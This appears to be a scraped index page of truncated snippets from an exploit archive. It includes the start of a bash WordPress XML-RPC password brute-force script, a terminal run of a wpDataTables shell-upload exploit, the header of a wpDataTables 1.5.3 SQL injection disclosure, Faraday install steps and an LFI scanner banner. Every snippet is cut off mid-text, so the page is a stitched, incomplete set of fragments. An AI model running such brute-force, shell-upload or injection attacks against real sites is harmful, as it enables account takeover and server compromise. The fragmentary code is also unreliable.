Simple WordPress Xml-rpc Brute Force written in bash with curl #!/bin/sh
#####################
# # # Scripted By : Claudio Viviani # http://www.homelab.it # http://adf.ly/1F1MNw (Full HomelabIT Archive Exploit) # http://ffhd.homelab.it (Free Fuzzy Hashes Database) # # [email protected] # [email protected] # # https://www.facebook.com/homelabit # https://twitter.com/homelabit # https://plus.google.com/+HomelabIt1/ # https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww # #####################
url=$1
user=$2
wordlist=$3
if [ -z "$wordlist" ]; then
echo "Usage: $0 http://TARGT username wordlist.txt"
exit 1
elif [ !...
claudio@backbox3:~/claudio$ python wpdatatables_shell_up.py -t http://10.0.0.67/wordpress -f shell.php ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ ______ __ _______ __ __ | Y .-----| _ \ .---.-| |_.---.-| .---.-| |--| .-----.-----. |. | | _ |. | \| _ | _| _ |....
######################
# Exploit Title : WordPress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani # Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
# Description
Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability
"table_id" variable is not sanitized.
File: wpdatatables....
Tested on:
Faraday Community Edition
BackBox Linux 3.x x86_64
Download Faraday claudio@backbox3:~$ wget https://github.com/infobyte/faraday/archive/master.zip Install requirements claudio@backbox3:~$ sudo pip install psycopg2
Downloading/unpacking psycopg2
Running setup.py egg_info for package psycopg2
Installing collected packages: psycopg2
Running setup.py install for psycopg2
Successfully installed psycopg2
Cleaning up...
claudio@backbox3:~$ Modify installation script claudio@backbox3:~$ unzip master.zip
claudio@backbox3:~$ cd faraday-master/
claudio@backbox3:~/faraday-master$ ls
apis AUTHORS config data deps exporters faraday.py gui install....
[claudio@localhost ~]$ ./aLFIscanner.py -u 10.0.0.67 -t lfi.php?ID=
$$\ $$$$$$$$\ $$$$$$\
$$ | $$ _____|\_$$ _|
$$$$$$\ $$ | $$ | $$ |
\____$$\ $$ | $$$$$\ $$ |
$$$$$$$ |$$ | $$ __| $$ |
$$ __$$ |$$ | $$ | $$ |
\$$$$$$$ |$$$$$$$$\ $$ | $$$$$$\
\_______|\________|\__| \______|
$$$$$$\
$$ __$$\
$$ / \__| $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$\
\$$$$$$\ $$ _____|\____$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\
\____$$\ $$ / $$$$$$$ |$$ | $$ |$$ | $$ |$$$$$$$$ |$$ | \__|
$$\ $$ |$$ | $$ __$$ |$$ | $$ |$$ | $$ |$$ ____|$$ |
\$$$$$$ |\$$$$$$$\$$$$$$$ |$$ | $$ |$$ | $$ |\$$$$$$$\ $$ |
\______/ \_______|\_______|\__| \__|\__| \__| \_______|\__|
An0th3r LFI sC4Nn3r v1....